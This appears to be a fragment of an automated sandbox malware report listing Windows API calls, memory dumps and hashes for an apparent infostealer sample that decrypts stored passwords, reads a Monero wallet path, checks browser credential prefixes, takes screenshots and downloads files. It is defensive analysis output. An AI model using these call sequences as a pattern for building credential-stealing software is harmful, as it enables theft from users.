                                • GetEnvironmentVariableA.KERNEL32(00D68A10,01229BD8,0000FFFF), ref: 00FFA026
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFA053
                                • lstrlen.KERNEL32(01229BD8), ref: 00FFA060
                                • lstrcpy.KERNEL32(00000000,01229BD8), ref: 00FFA08A
                                • lstrlen.KERNEL32(01024C4C), ref: 00FFA095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFA0B2
                                • lstrcat.KERNEL32(00000000,01024C4C), ref: 00FFA0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFA0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFA0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFA114
                                • SetEnvironmentVariableA.KERNEL32(00D68A10,00000000), ref: 00FFA12F
                                • LoadLibraryA.KERNEL32(00D56738), ref: 00FFA143
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: fb2925be5261277599a54544ad9003485cd359b19ca333f3b27e1a09d24aac83
                                • Instruction ID: ce42d82549aec54a952932cce12a13a38e903f42d5c1bd595a91c0020c29eb7a
                                • Opcode Fuzzy Hash: fb2925be5261277599a54544ad9003485cd359b19ca333f3b27e1a09d24aac83
                                • Instruction Fuzzy Hash: DE9118B0A00618AFD7309FA4EC48A7A37F9EF54714F454018F7098B265EBB9DC40EB92
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100C8A2
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100C8D1
                                • lstrlen.KERNEL32(00000000), ref: 0100C8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100C932
                                • StrCmpCA.SHLWAPI(00000000,01024C3C), ref: 0100C943
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 55450b1f0b708b28ba90aa4573f67548a1f62d037749dd6f2e7acb5e2e82bbd1
                                • Instruction ID: 4513869eb5de420c5f0981a87675bcde50da0fc3037cb35d7da6a85e2db72efd
                                • Opcode Fuzzy Hash: 55450b1f0b708b28ba90aa4573f67548a1f62d037749dd6f2e7acb5e2e82bbd1
                                • Instruction Fuzzy Hash: B261E871D002259BFF62DF79CD49AAE7BF8AF05304F1002E9E981E7291D7788945CB90
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,01010CF0), ref: 01014276
                                • GetDesktopWindow.USER32 ref: 01014280
                                • GetWindowRect.USER32(00000000,?), ref: 0101428D
                                • SelectObject.GDI32(00000000,00000000), ref: 010142BF
                                • GetHGlobalFromStream.COMBASE(01010CF0,?), ref: 01014336
                                • GlobalLock.KERNEL32(?), ref: 01014340
                                • GlobalSize.KERNEL32(?), ref: 0101434D
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: 486af18a3e3a34dbb98894b81941666d53779f61a79df93a350b0893ccb3d17f
                                • Instruction ID: b811ed04ec0bde76be4f21c7b278b81ddf8afbb039556de6ed67c5347b6ae970
                                • Opcode Fuzzy Hash: 486af18a3e3a34dbb98894b81941666d53779f61a79df93a350b0893ccb3d17f
                                • Instruction Fuzzy Hash: 8E512F75910218AFDB20DFA4EC89EEE77B9EF48304F105419FA05E3254DB78AE419BA0
                                APIs
                                • lstrcat.KERNEL32(?,00D6EEB0), ref: 0100E00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0100E037
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E06F
                                • lstrcat.KERNEL32(?,00000000), ref: 0100E07D
                                • lstrcat.KERNEL32(?,?), ref: 0100E098
                                • lstrcat.KERNEL32(?,?), ref: 0100E0AC
                                • lstrcat.KERNEL32(?,00D5A488), ref: 0100E0C0
                                • lstrcat.KERNEL32(?,?), ref: 0100E0D4
                                • lstrcat.KERNEL32(?,00D6D970), ref: 0100E0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 0100E126
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: c8e887be412ee5f4cc44058b0049a7080daaaf1cfbaabe3076c3541709539100
                                • Instruction ID: ee48101f30e590d5fa73744aad500b14b4ff89ad5d4e42a21060d7fad8fee9ef
                                • Opcode Fuzzy Hash: c8e887be412ee5f4cc44058b0049a7080daaaf1cfbaabe3076c3541709539100
                                • Instruction Fuzzy Hash: 1F61807191011CEBDB65DF64DC48AEDB7B8BF48300F1049A8F649A3294DB749F859F90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF6AFF
                                • InternetOpenA.WININET(0101CFEC,00000001,00000000,00000000,00000000), ref: 00FF6B2C
                                • StrCmpCA.SHLWAPI(?,00D6F3C8), ref: 00FF6B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00FF6B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FF6B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00FF6BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00FF6BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00FF6BF0
                                • CloseHandle.KERNEL32(00000000), ref: 00FF6C10
                                • InternetCloseHandle.WININET(00000000), ref: 00FF6C17
                                • InternetCloseHandle.WININET(?), ref: 00FF6C21
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: 6d307af321f1e76c1b852cc42611ce657d8cff559f8f571232c5202f28b0c99d
                                • Instruction ID: 2f9cff1f4a2e2cc0fc50a059e5a8e7f4190528fc609fdbb3d228f4ff4be2357f
                                • Opcode Fuzzy Hash: 6d307af321f1e76c1b852cc42611ce657d8cff559f8f571232c5202f28b0c99d
                                • Instruction Fuzzy Hash: 97417E71A00219BBEB30DE64EC49FAE77A8AF44705F404554FB05E7294EF74AE409BA4
                                APIs
                                • memset.MSVCRT ref: 0101451A
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,01004F39), ref: 01014545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0101454C
                                • wsprintfW.USER32 ref: 0101455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 010145CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 010145D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 010145E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                • String ID: 9O$%hs
                                • API String ID: 3729781310-3040109702
                                • Opcode ID: 7ebc454a3ff17439d3d2327d78369e5867186b6f8fbc3769f03b36e4198fdb8b
                                • Instruction ID: 7a9db82318e5db5cf8dedb0a8fc6504a29658fb7bfeee62029ca966a68f87006
                                • Opcode Fuzzy Hash: 7ebc454a3ff17439d3d2327d78369e5867186b6f8fbc3769f03b36e4198fdb8b
                                • Instruction Fuzzy Hash: B6316D72A00219BBEB30DFA4EC89FDE77B8BF44700F104055FA05E7188DB78A6458BA5
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFBC1F
                                • lstrlen.KERNEL32(00000000), ref: 00FFBC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFBC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFBC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFBCAC
                                • lstrlen.KERNEL32(01024AD4), ref: 00FFBD23
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 2752568c7b1e489ed4755b3e154203188b341fc326c40053802a7a45d9cb44de
                                • Instruction ID: 6d867105b2a9789da60d390825ca18f298460ca22d53063e78e193f8649c3259
                                • Opcode Fuzzy Hash: 2752568c7b1e489ed4755b3e154203188b341fc326c40053802a7a45d9cb44de
                                • Instruction Fuzzy Hash: 2EA18D30A012099FCB75EF28E949ABEB7F4AF44314F188069E609DB271DB79DC41EB51
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 01015F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 01015F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 01016014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 0101609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 010160D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: 3276ba597359758ca6cfd880c2baae03c34359db39af7e04217cc6a97f9879ef
                                • Instruction ID: 27f6b29367600981a2ccdb9ce30529598abc24e7fff0377a114e87f1fd5752ce
                                • Opcode Fuzzy Hash: 3276ba597359758ca6cfd880c2baae03c34359db39af7e04217cc6a97f9879ef
                                • Instruction Fuzzy Hash: 45619E70700104DBDB29CF5CCC949AEB7B6EF85314B284A4DF5D28B389D77AAD808B94
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E06F
                                • lstrcat.KERNEL32(?,00000000), ref: 0100E07D
                                • lstrcat.KERNEL32(?,?), ref: 0100E098
                                • lstrcat.KERNEL32(?,?), ref: 0100E0AC
                                • lstrcat.KERNEL32(?,00D5A488), ref: 0100E0C0
                                • lstrcat.KERNEL32(?,?), ref: 0100E0D4
                                • lstrcat.KERNEL32(?,00D6D970), ref: 0100E0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 0100E126
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: aa3fd8230858481b7020697050519bcba2b6f6d81c792a2ea1b5c45d436d1375
                                • Instruction ID: f218345762850b45fc92f14ecf75021f1c9b2f5647b54e6bdae3ddb57d1dc3c1
                                • Opcode Fuzzy Hash: aa3fd8230858481b7020697050519bcba2b6f6d81c792a2ea1b5c45d436d1375
                                • Instruction Fuzzy Hash: B4419D3191012CABDB72EF64DC48AED77B4BF48300F0049A4F64AA3291DB789F859F90
                                APIs
                                  • Part of subcall function 00FF77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FF7805
                                  • Part of subcall function 00FF77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00FF784A
                                  • Part of subcall function 00FF77D0: StrStrA.SHLWAPI(?,Password), ref: 00FF78B8
                                  • Part of subcall function 00FF77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FF78EC
                                  • Part of subcall function 00FF77D0: HeapFree.KERNEL32(00000000), ref: 00FF78F3
                                • lstrcat.KERNEL32(00000000,01024AD4), ref: 00FF7A90
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF7ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 00FF7ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF7AF0
                                • wsprintfA.USER32 ref: 00FF7B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF7B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF7B47
                                • lstrcat.KERNEL32(00000000,01024AD4), ref: 00FF7B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: d90605160b0683521be16cb85bdbaba3959d8d4659213b35260690144b0ddd3e
                                • Instruction ID: 001c5975a3691ac55dda82f07cc0b20eb252fe3f05cad0b2b560e9c9ac15bbde
                                • Opcode Fuzzy Hash: d90605160b0683521be16cb85bdbaba3959d8d4659213b35260690144b0ddd3e
                                • Instruction Fuzzy Hash: C9319272A04228EFCB30EF68E8489BEB7B9EF84714F145519F60593214DB74E941EB50
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 0100820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01008243
                                • lstrlen.KERNEL32(00000000), ref: 01008260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01008297
                                • lstrlen.KERNEL32(00000000), ref: 010082B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010082EB
                                • lstrlen.KERNEL32(00000000), ref: 01008308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01008337
                                • lstrlen.KERNEL32(00000000), ref: 01008351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01008380
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: ac1c6d3f21be3afdd70a87204131b28c51610777bec1b9a04f4d9bdfc46f7be4
                                • Instruction ID: 8fa78289035d7ba596b1b95667ae09db4007b5470cbc93a2de14a723002900ef
                                • Opcode Fuzzy Hash: ac1c6d3f21be3afdd70a87204131b28c51610777bec1b9a04f4d9bdfc46f7be4
                                • Instruction Fuzzy Hash: 8F519171900612ABFB65DF38D858A6EBBE8FF40300F118555EE86EB294DB74E950CBD0
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FF7805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00FF784A
                                • StrStrA.SHLWAPI(?,Password), ref: 00FF78B8
                                  • Part of subcall function 00FF7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FF775E
                                  • Part of subcall function 00FF7750: RtlAllocateHeap.NTDLL(00000000), ref: 00FF7765
                                  • Part of subcall function 00FF7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FF778D
                                  • Part of subcall function 00FF7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00FF77AD
                                  • Part of subcall function 00FF7750: LocalFree.KERNEL32(?), ref: 00FF77B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FF78EC
                                • HeapFree.KERNEL32(00000000), ref: 00FF78F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00FF7A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: b31aaf9cbecdd0f998ea6d03858880e23b0232bb93b762f486105b19edfd883d
                                • Instruction ID: 7b03f527240819a022dc2adfc2b53bb5fc5064903fb350c8a7c94aab9331a1ef
                                • Opcode Fuzzy Hash: b31aaf9cbecdd0f998ea6d03858880e23b0232bb93b762f486105b19edfd883d
                                • Instruction Fuzzy Hash: 617130B1D0021DABDB10DF95DC85AEEF7B8EF44300F144569E609A7210EB75AE85DF90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF1135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00FF113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00FF1159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00FF1173
                                • RegCloseKey.ADVAPI32(?), ref: 00FF117D
                                Strings
                                • SOFTWARE\monero-project\monero-core, xrefs: 00FF114F
                                • wallet_path, xrefs: 00FF116D
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: 69f1f43c508f9917b4c1600b162cf1c8a6336c68d462ed87908e48822734ade2
                                • Instruction ID: eee2f736bf22f584718a8bc927e7f4d9556c6e745ba08347ba594d62431470e8
                                • Opcode Fuzzy Hash: 69f1f43c508f9917b4c1600b162cf1c8a6336c68d462ed87908e48822734ade2
                                • Instruction Fuzzy Hash: D6F01D75A40219BBEB209BA1AC4DFAE7B7CEB44715F100154FF05E6244E6B49A4487A0
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 00FF9E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 00FF9E42
                                • LocalAlloc.KERNEL32(00000040), ref: 00FF9EA7
                                  • Part of subcall function 010171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 010171FE
                                • lstrcpy.KERNEL32(00000000,01024C48), ref: 00FF9FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
